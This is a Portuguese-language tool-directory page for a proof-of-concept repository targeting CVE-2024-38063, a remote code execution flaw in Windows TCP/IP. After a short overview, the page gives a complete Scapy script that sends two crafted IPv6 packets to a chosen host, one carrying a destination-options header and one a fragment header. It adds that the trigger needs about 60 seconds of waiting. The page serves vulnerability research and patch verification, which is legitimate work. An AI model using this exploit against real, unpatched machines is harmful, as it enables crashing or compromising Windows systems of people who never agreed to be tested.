Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-38063 — Exploit de prova de conceito para CVE-2024-38063, uma vulnerabilidade de execução remota de código no TCP/IP do Windows acionada pelo envio de dois pacotes IPv6 manipulados com opções de destino e cabeçalhos de fragmento. | Kitploit
Ferramentas/GitHubGitHub/patchpoint/cve-2024-38063
Análise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

Exploit de prova de conceito para CVE-2024-38063, uma vulnerabilidade de execução remota de código no TCP/IP do Windows acionada pelo envio de dois pacotes IPv6 manipulados com opções de destino e cabeçalhos de fragmento.

Ver Repositório
2032há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-38063

Visão Geral

Em agosto de 2024, a Microsoft lançou uma correção para uma vulnerabilidade de Execução Remota de Código (RCE) no TCP/IP do Windows. Alguns pesquisadores já publicaram Provas de Conceito (PoC) para esta vulnerabilidade e, aproximadamente ao mesmo tempo, os pesquisadores da PatchPoint também concluíram sua análise e reprodução deste problema. Devido à disseminação de desinformação em várias plataformas, incluindo Twitter, parece que os pontos críticos necessários para acionar esta vulnerabilidade foram mal compreendidos. Contrariamente a essas imprecisões, decidimos lançar uma PoC que demonstra como esta vulnerabilidade pode ser acionada com a transmissão de apenas dois pacotes.; Na realidade, um grande número de pacotes não é necessário para acionar esta vulnerabilidade.

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

DEMO

CVE-2024-38063_Demo.mp4

※ Para acionar a vulnerabilidade, é necessário um tempo de espera de aproximadamente 60 segundos

Referência

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Baixar ferramenta